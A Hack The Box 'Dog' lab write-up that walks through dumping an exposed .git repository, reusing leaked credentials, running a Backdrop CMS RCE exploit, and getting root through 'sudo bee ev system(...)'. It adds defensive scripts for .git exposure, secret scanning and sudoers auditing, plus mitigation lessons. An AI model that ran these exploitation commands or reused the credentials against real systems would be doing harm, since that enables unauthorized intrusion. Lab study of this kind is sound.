
HTB Dog Writeup


INFO

Machine IP = 10.10.11.58
OS = Linux
Level = EASY
Points = 20

Let’s start by adding the machine to our hosts file:

echo "10.10.11.58 dog.htb" >> /etc/hosts

Enumeration

Port Scanning

nmap -sC -sV -oA initial_scan 10.10.11.58

Open Ports:

  • 22/tcp: OpenSSH
  • 80/tcp: Apache 2.4.41 (HTTP)

Directory Enumeration (gobuster)

gobuster dir -u http://10.10.11.58 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Key Directories:

  • /files
  • /themes
  • /modules
  • /sites
  • /core
  • /layouts

Initial Access

Exposed Git Repository

Discovered an exposed .git directory. Dumped it using git-dumper:

git-dumper http://10.10.11.58/.git/ ./dog_git_repo
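An exposed .git directory is a server-side configuration failure: the repository metadata is sitting inside the document root and nothing tells the web server to refuse requests for it. As an added example (not part of the original writeup), the script below does the two checks a defender would run on a Backdrop host like this one: it lists every .git directory below a web root, and it verifies that an Apache configuration carries a DirectoryMatch/LocationMatch block that denies access to .git paths. The web root layout, the two config snippets and all paths are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the writeup: locate .git directories below a web
# root and check that an Apache config denies HTTP access to them. The web root
# and config snippets below are constructed for the demo.

# Print every .git directory found below the given web root (one per line).
find_git_dirs() {
    find "$1" -type d -name .git 2>/dev/null
}

# Exit 0 if the Apache config contains a <DirectoryMatch>/<LocationMatch> block
# that targets .git paths and carries "Require all denied", else exit 1.
apache_denies_git() {
    awk '
        /<(Directory|Location)Match[ \t]/ && /\.git/ { inblock = 1 }
        inblock && /Require[ \t]+all[ \t]+denied/   { ok = 1 }
        /<\/(Directory|Location)Match>/             { inblock = 0 }
        END { exit (ok ? 0 : 1) }
    ' "$1"
}

# Build a throwaway fixture: a Backdrop-style web root with leaked .git
# metadata, plus one hardened and one permissive Apache snippet.
make_demo_fixture() {
    t=$(mktemp -d)
    mkdir -p "$t/webroot/.git" "$t/webroot/core" "$t/webroot/files"
    echo "ref: refs/heads/master" > "$t/webroot/.git/HEAD"
    cat > "$t/deny-git.conf" <<'EOF'
# Deny HTTP access to VCS metadata anywhere under the document root
<DirectoryMatch "/\.git/">
    Require all denied
</DirectoryMatch>
EOF
    cat > "$t/permissive.conf" <<'EOF'
<Directory /var/www/html>
    Require all granted
</Directory>
EOF
    echo "$t"
}

fx=$(make_demo_fixture)
echo "== .git directories under $fx/webroot =="
find_git_dirs "$fx/webroot"
for conf in deny-git.conf permissive.conf; do
    if apache_denies_git "$fx/$conf"; then
        echo "$conf: .git access denied"
    else
        echo "$conf: WARNING - .git is reachable over HTTP"
    fi
done
```

On a real host, point find_git_dirs at the DocumentRoot and apache_denies_git at the effective configuration (for example the output of apachectl -t -D DUMP_INCLUDES, or each file under /etc/apache2); the better fix is to deploy from a build artifact so that no .git directory exists under the document root at all.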

Database Credentials

In settings.php, found credentials for the Backdrop CMS database:

$database = 'mysql://root:[email protected]/backdrop';
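Connection strings like the one in settings.php are exactly what a dumped repository hands an attacker, and the same pattern recurs in JSON configuration under files/. As an added example (not part of the original writeup), the script below scans a directory tree for URL-embedded credentials (scheme://user:password@host) and for password/secret style keys, and reports each location with the secret masked so the report itself is safe to share. The sample settings.php, config.json and README.md it scans are constructed for the demo, as is the password value in them.

```shell
#!/bin/sh
# Added example, not part of the writeup: scan a dumped repository or web root
# for connection strings and password-style keys, printing their locations with
# the secret value masked. The sample files below are constructed for the demo.

# Usage: scan_for_credentials DIR
# Prints "file:line:match" with the secret replaced by ***.
# Exit status: 0 when nothing was found, 1 when at least one hit was printed.
scan_for_credentials() {
    # Pattern 1: URL-embedded credentials such as mysql://user:pass@host/db
    # Pattern 2: password/passwd/secret/api_key assignments in PHP, JSON or INI
    hits=$(grep -rnoIE \
        -e '[a-z]+://[^:/[:space:]]+:[^@[:space:]]+@' \
        -e '(password|passwd|secret|api_key)"?[[:space:]]*[=:][[:space:]]*"?[^"[:space:],;]+' \
        "$1" 2>/dev/null |
        sed -E -e 's#(://[^:]+:)[^@]+@#\1***@#' \
               -e 's#((password|passwd|secret|api_key)"?[[:space:]]*[=:][[:space:]]*"?)[^"[:space:],;]+$#\1***#')
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Build a throwaway tree in the style of the dumped Backdrop repository.
# Sample123 is a constructed placeholder, not a value from the box.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/files"
    printf '%s\n' "\$database = 'mysql://root:Sample123@127.0.0.1/backdrop';" > "$d/settings.php"
    printf '%s\n' '{"site_name": "dog", "password": "Sample123"}' > "$d/files/config.json"
    printf '%s\n' 'See https://docs.backdropcms.org/documentation/url-aliases' > "$d/README.md"
    echo "$d"
}

d=$(make_demo_tree)
echo "== scanning $d =="
scan_for_credentials "$d" || echo "(rotate every credential listed above and move it out of the repository)"
rm -rf "$d"
```

The keyword list is deliberately short and case-sensitive; it catches the settings.php and update.settings.json shapes seen on this box but not, for example, PHP array keys such as $conf['db_password']. Treat it as a pre-commit or CI gate for the repository, not as a replacement for a full secret scanner.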

CMS Authentication

Identified valid credentials via Git logs:

grep -r dog.htb

.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000    commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000       commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "[email protected]"

Used these to log into the Backdrop CMS dashboard.

Exploitation

Backdrop CMS 1.27.1 RCE

Exploit Used: Authenticated RCE via Project Installer (Exploit-DB 52021)

  • Generate Payload:

    searchsploit -m php/webapps/52021.py
    python3 52021.py http://dog.htb

  • Bypass ZIP Restriction:

    tar -cvf shell.tar shell/  # Server blocked ZIP uploads

  • Upload shell.tar via CMS and trigger execution to gain a reverse shell.

In the shell I executed this command:

cat /etc/passwd | grep bash

root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash

Then I connected over SSH with the username johncusack and the password found initially.

ssh johncusack@dog.htb
# password: BackDropJ2024DS2024
ssh johncusack@dog.htb
johncusack@dog.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue 18 Mar 2025 11:52:54 PM UTC

  System load:  0.15              Processes:             228
  Usage of /:   49.5% of 6.32GB   Users logged in:       0
  Memory usage: 19%               IPv4 address for eth0: 10.10.11.58
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

johncusack@dog:~$ cat user.txt

Privilege Escalation

Privilege Escalation via bee CLI Tool: Detailed Explanation

After gaining SSH access as johncusack, the sudo -l command reveals the following:

johncusack@dog:~$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

This means johncusack can run /usr/local/bin/bee as root via sudo; the rule carries no NOPASSWD tag, so the user's own password is required, as the prompt above shows.

What is bee?

bee is a CLI tool bundled with Backdrop CMS (similar to drush for Drupal). It allows administrators to:

  • Manage the CMS (e.g., clear caches, run updates).
  • Execute arbitrary PHP code on the server.

Steps:

  • Navigate to the web root:

    johncusack@dog:~$ cd /var/www/html/

  • Execute arbitrary PHP code as root:

    johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee ev "system('cat /root/root.txt')"

  • bee ev: evaluates the PHP code provided.
  • system('cat /root/root.txt'): executes the shell command cat /root/root.txt via PHP's system() function.
  • Since this runs with sudo, the command is executed as root, bypassing file permissions.

Flags

  • User Flag: f8003…6159 (Located at /home/johncusack/user.txt)
  • Root Flag: b0019…c80f (Retrieved via sudo exploitation)

Mitigation Lessons:

This machine highlights the risks of exposed .git repositories and outdated CMS versions.

  • Restrict Sudo Permissions: Avoid granting wildcard sudo access (ALL : ALL) to CLI tools that execute code.
  • Sandbox CMS Tools: Limit tools like bee to non-root users or restrict their functionality.
  • Audit Sudoers: Regularly review /etc/sudoers to identify overly permissive rules.
  • Patch Management: Update CMS components to mitigate RCE vulnerabilities.
  • Credential Leaks: Always secure configuration files.
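The sudoers audit above can be made routine. As an added example (not part of the original writeup), the script below reads a file in /etc/sudoers syntax and flags every rule that grants a user an interpreter or a CMS command-line tool such as bee or drush, or ALL, as root; a rule scoped to a single non-interpreter command passes. The list of risky tool names is illustrative, and the sample sudoers content is constructed for the demo (it contains the rule from this box in sudoers form, plus a narrowly scoped one).

```shell
#!/bin/sh
# Added example, not part of the writeup: flag sudoers rules that let a user run
# an interpreter or a CMS command-line tool as root. The tool list is
# illustrative and the sample sudoers content is constructed for the demo.

# Usage: audit_sudoers FILE   (FILE uses /etc/sudoers syntax)
# Prints one RISK line per offending rule.
# Exit status: 0 when nothing risky was found, 1 otherwise.
audit_sudoers() {
    awk -v risky="ALL bee drush php python python3 perl ruby node sh bash env" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) risk[r[i]] = 1 }
    /^[ \t]*#/ || /^[ \t]*$/ || /^Defaults/ { next }   # comments, blanks, Defaults lines
    index($0, "=") == 0 { next }                         # not a user specification
    {
        who = $1
        rhs = substr($0, index($0, "=") + 1)             # e.g. "(ALL : ALL) /usr/local/bin/bee"
        runas = "root"                                   # sudo default when no (runas) is given
        if (match(rhs, /\([^)]*\)/)) {
            runas = substr(rhs, RSTART + 1, RLENGTH - 2)
            rhs = substr(rhs, RSTART + RLENGTH)
        }
        gsub(/(NOPASSWD|PASSWD|NOEXEC|SETENV):/, "", rhs)  # drop tag specifications
        m = split(rhs, cmds, ",")
        for (i = 1; i <= m; i++) {
            sub(/^[ \t]+/, "", cmds[i])
            split(cmds[i], w, /[ \t]+/)
            cmd = w[1]                                   # command path, arguments dropped
            base = cmd; sub(/.*\//, "", base)            # /usr/local/bin/bee -> bee
            if (base in risk) {
                printf "RISK: %s may run %s as (%s): code execution as root\n", who, cmd, runas
                count++
            }
        }
    }
    END { exit (count ? 1 : 0) }' "$1"
}

# Write a constructed sudoers file for the demo and print its path.
make_demo_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample: the rule from the box plus a narrowly scoped one
Defaults env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
johncusack ALL=(ALL : ALL) /usr/local/bin/bee
webadmin ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/systemctl status apache2
EOF
    echo "$f"
}

f=$(make_demo_sudoers)
echo "== auditing $f =="
audit_sudoers "$f" || echo "(review the rules above; prefer narrowly scoped commands or a dedicated non-root user)"
rm -f "$f"
```

Note that the function parses sudoers file syntax, not the output of sudo -l, so run it over /etc/sudoers and each file in /etc/sudoers.d. Any tool that can evaluate code (bee ev, drush php-eval, a bare interpreter) is equivalent to granting a root shell, whatever the rule's apparent scope.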

Done!



This post is licensed under CC BY 4.0 by the author.